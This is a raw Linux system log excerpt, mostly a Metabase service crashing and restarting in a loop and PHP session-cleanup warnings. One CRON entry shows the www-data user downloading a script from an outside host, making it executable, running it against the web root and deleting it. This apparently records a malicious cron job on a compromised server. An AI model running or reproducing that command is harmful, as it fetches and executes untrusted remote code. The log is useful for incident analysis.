
Sep 16 21:48:45 vmi147857 systemd[1]: metabase.service: Main process exited, code=exited, status=1/FAILURE
Sep 16 21:48:45 vmi147857 systemd[1]: metabase.service: Unit entered failed state.
Sep 16 21:48:45 vmi147857 systemd[1]: metabase.service: Failed with result 'exit-code'.
Sep 16 21:48:45 vmi147857 systemd[1]: metabase.service: Service hold-off time over, scheduling restart.
Sep 16 21:48:45 vmi147857 systemd[1]: Started Metabase server.
Sep 16 21:50:00 vmi147857 systemd[1]: metabase.service: Main process exited, code=exited, status=1/FAILURE
Sep 16 21:50:00 vmi147857 systemd[1]: metabase.service: Unit entered failed state.
Sep 16 21:50:00 vmi147857 systemd[1]: metabase.service: Failed with result 'exit-code'.
Sep 16 21:50:01 vmi147857 systemd[1]: metabase.service: Service hold-off time over, scheduling restart.
Sep 16 21:50:01 vmi147857 systemd[1]: ': /etc/default/metabase
Sep 16 21:50:01 vmi147857 systemd[1]: Started Metabase server.
Sep 16 21:51:17 vmi147857 systemd[1]: metabase.service: Main process exited, code=exited, status=1/FAILURE
Sep 16 21:51:17 vmi147857 systemd[1]: metabase.service: Unit entered failed state.
Sep 16 21:51:17 vmi147857 systemd[1]: metabase.service: Failed with result 'exit-code'.
Sep 16 21:51:17 vmi147857 systemd[1]: metabase.service: Service hold-off time over, scheduling restart.
Sep 16 21:51:17 vmi147857 systemd[1]: Stopped Metabase server.
Sep 16 21:51:17 vmi147857 systemd[1]: ': /etc/default/metabase
Sep 16 21:51:17 vmi147857 systemd[1]: Started Metabase server.
Sep 16 21:52:33 vmi147857 systemd[1]: metabase.service: Main process exited, code=exited, status=1/FAILURE
Sep 16 21:52:33 vmi147857 systemd[1]: metabase.service: Unit entered failed state.
Sep 16 21:52:33 vmi147857 systemd[1]: metabase.service: Failed with result 'exit-code'.
Sep 16 21:52:34 vmi147857 systemd[1]: metabase.service: Service hold-off time over, scheduling restart.
Sep 16 21:52:34 vmi147857 systemd[1]: Stopped Metabase server.
Sep 16 21:52:34 vmi147857 systemd[1]: ': /etc/default/metabase
Sep 16 21:52:34 vmi147857 systemd[1]: Started Metabase server.
Sep 16 21:53:49 vmi147857 systemd[1]: metabase.service: Main process exited, code=exited, status=1/FAILURE
Sep 16 21:53:49 vmi147857 systemd[1]: metabase.service: Unit entered failed state.
Sep 16 21:53:49 vmi147857 systemd[1]: metabase.service: Failed with result 'exit-code'.
Sep 16 21:53:49 vmi147857 systemd[1]: metabase.service: Service hold-off time over, scheduling restart.
Sep 16 21:55:04 vmi147857 systemd[1]: metabase.service: Main process exited, code=exited, status=1/FAILURE
Sep 16 21:55:04 vmi147857 systemd[1]: metabase.service: Unit entered failed state.
Sep 16 21:55:04 vmi147857 systemd[1]: metabase.service: Failed with result 'exit-code'.
Sep 16 21:55:04 vmi147857 systemd[1]: metabase.service: Service hold-off time over, scheduling restart.
Sep 16 21:56:20 vmi147857 systemd[1]: metabase.service: Main process exited, code=exited, status=1/FAILURE
Sep 16 21:56:20 vmi147857 systemd[1]: metabase.service: Unit entered failed state.
Sep 16 21:56:20 vmi147857 systemd[1]: metabase.service: Failed with result 'exit-code'.
Sep 16 21:56:20 vmi147857 systemd[1]: metabase.service: Service hold-off time over, scheduling restart.
Sep 16 21:57:35 vmi147857 systemd[1]: metabase.service: Main process exited, code=exited, status=1/FAILURE
Sep 16 21:57:35 vmi147857 systemd[1]: metabase.service: Unit entered failed state.
Sep 16 21:57:35 vmi147857 systemd[1]: metabase.service: Failed with result 'exit-code'.
Sep 16 21:57:35 vmi147857 systemd[1]: metabase.service: Service hold-off time over, scheduling restart.
Sep 16 21:58:50 vmi147857 systemd[1]: metabase.service: Main process exited, code=exited, status=1/FAILURE
Sep 16 21:58:50 vmi147857 systemd[1]: metabase.service: Unit entered failed state.
Sep 16 21:58:50 vmi147857 systemd[1]: metabase.service: Failed with result 'exit-code'.
Sep 16 21:58:51 vmi147857 systemd[1]: metabase.service: Service hold-off time over, scheduling restart.
Sep 16 22:00:01 vmi147857 CRON[21557]: (www-data) CMD (wget -q -O xxxd http://hello.hellodolly777.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /var/www/html/site 24 && rm -f xxxd)
Sep 16 22:00:01 vmi147857 CRON[21556]: (CRON) info (No MTA installed, discarding output)
Sep 16 22:00:06 vmi147857 systemd[1]: metabase.service: Main process exited, code=exited, status=1/FAILURE
Sep 16 22:00:06 vmi147857 systemd[1]: metabase.service: Unit entered failed state.
Sep 16 22:00:06 vmi147857 systemd[1]: metabase.service: Failed with result 'exit-code'.
Sep 16 22:00:06 vmi147857 systemd[1]: metabase.service: Service hold-off time over, scheduling restart.
Sep 16 22:02:38 vmi147857 systemd[1]: metabase.service: Main process exited, code=exited, status=1/FAILURE
Sep 16 22:02:38 vmi147857 systemd[1]: metabase.service: Unit entered failed state.
Sep 16 22:02:38 vmi147857 systemd[1]: metabase.service: Failed with result 'exit-code'.
Sep 16 22:02:38 vmi147857 systemd[1]: metabase.service: Service hold-off time over, scheduling restart.
Sep 16 22:02:38 vmi147857 systemd[1]: Stopped Metabase server.
Sep 16 22:05:11 vmi147857 systemd[1]: ': /etc/default/metabase
Sep 16 22:05:11 vmi147857 systemd[1]: Started Metabase server.
Sep 16 22:05:56 vmi147857 systemd[1]: Created slice User Slice of root.
Sep 16 22:05:56 vmi147857 systemd[1]: Starting User Manager for UID 0...
Sep 16 22:05:56 vmi147857 systemd[1]: Started Session 3756 of user root.
Sep 16 22:05:56 vmi147857 systemd[22339]: Listening on GnuPG cryptographic agent and passphrase cache.
Sep 16 22:05:56 vmi147857 systemd[22339]: Listening on GnuPG cryptographic agent (access for web browsers).
Sep 16 22:05:56 vmi147857 systemd[22339]: Reached target Paths.
Sep 16 22:05:56 vmi147857 systemd[22339]: Reached target Timers.
Sep 16 22:05:56 vmi147857 systemd[22339]: Listening on GnuPG cryptographic agent (ssh-agent emulation).
Sep 16 22:05:56 vmi147857 systemd[22339]: Listening on GnuPG cryptographic agent and passphrase cache (restricted).
Sep 16 22:05:56 vmi147857 systemd[22339]: Reached target Sockets.
Sep 16 22:05:56 vmi147857 systemd[22339]: Reached target Basic System.
Sep 16 22:05:56 vmi147857 systemd[22339]: Reached target Default.
Sep 16 22:05:56 vmi147857 systemd[22339]: Startup finished in 27ms.
Sep 16 22:05:56 vmi147857 systemd[1]: Started User Manager for UID 0.
Sep 16 22:06:28 vmi147857 systemd[1]: metabase.service: Main process exited, code=exited, status=1/FAILURE
Sep 16 22:06:28 vmi147857 systemd[1]: metabase.service: Unit entered failed state.
Sep 16 22:06:28 vmi147857 systemd[1]: metabase.service: Failed with result 'exit-code'.
Sep 16 22:06:28 vmi147857 systemd[1]: metabase.service: Service hold-off time over, scheduling restart.
Sep 16 22:09:01 vmi147857 CRON[22773]: (root) CMD (  [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi)
Sep 16 22:09:07 vmi147857 systemd[1]: Starting Clean php session files...
Sep 16 22:09:08 vmi147857 sessionclean[22785]: PHP Warning:  PHP Startup: Unable to load dynamic library '/usr/lib/php/20151012/igbinary.so' - /usr/lib/php/20151012/igbinary.so: cannot open shared object file: No such file or directory in Unknown on line 0
Sep 16 22:09:08 vmi147857 sessionclean[22785]: PHP Warning:  PHP Startup: Unable to load dynamic library '/usr/lib/php/20151012/imagick.so' - /usr/lib/php/20151012/imagick.so: cannot open shared object file: No such file or directory in Unknown on line 0
Sep 16 22:09:08 vmi147857 sessionclean[22785]: PHP Warning:  PHP Startup: Unable to load dynamic library '/usr/lib/php/20151012/msgpack.so' - /usr/lib/php/20151012/msgpack.so: cannot open shared object file: No such file or directory in Unknown on line 0
Sep 16 22:09:08 vmi147857 sessionclean[22785]: PHP Warning:  PHP Startup: Unable to load dynamic library '/usr/lib/php/20151012/memcached.so' - /usr/lib/php/20151012/memcached.so: cannot open shared object file: No such file or directory in Unknown on line 0
Sep 16 22:09:08 vmi147857 sessionclean[22785]: PHP Warning:  PHP Startup: Unable to load dynamic library '/usr/lib/php/20151012/igbinary.so' - /usr/lib/php/20151012/igbinary.so: cannot open shared object file: No such file or directory in Unknown on line 0
Sep 16 22:09:08 vmi147857 sessionclean[22785]: PHP Warning:  PHP Startup: Unable to load dynamic library '/usr/lib/php/20151012/imagick.so' - /usr/lib/php/20151012/imagick.so: cannot open shared object file: No such file or directory in Unknown on line 0
Sep 16 22:09:08 vmi147857 sessionclean[22785]: PHP Warning:  PHP Startup: Unable to load dynamic library '/usr/lib/php/20151012/msgpack.so' - /usr/lib/php/20151012/msgpack.so: cannot open shared object file: No such file or directory in Unknown on line 0
Sep 16 22:09:08 vmi147857 sessionclean[22785]: PHP Warning:  PHP Startup: Unable to load dynamic library '/usr/lib/php/20151012/memcached.so' - /usr/lib/php/20151012/memcached.so: cannot open shared object file: No such file or directory in Unknown on line 0
Sep 16 22:09:08 vmi147857 systemd[1]: Started Clean php session files.
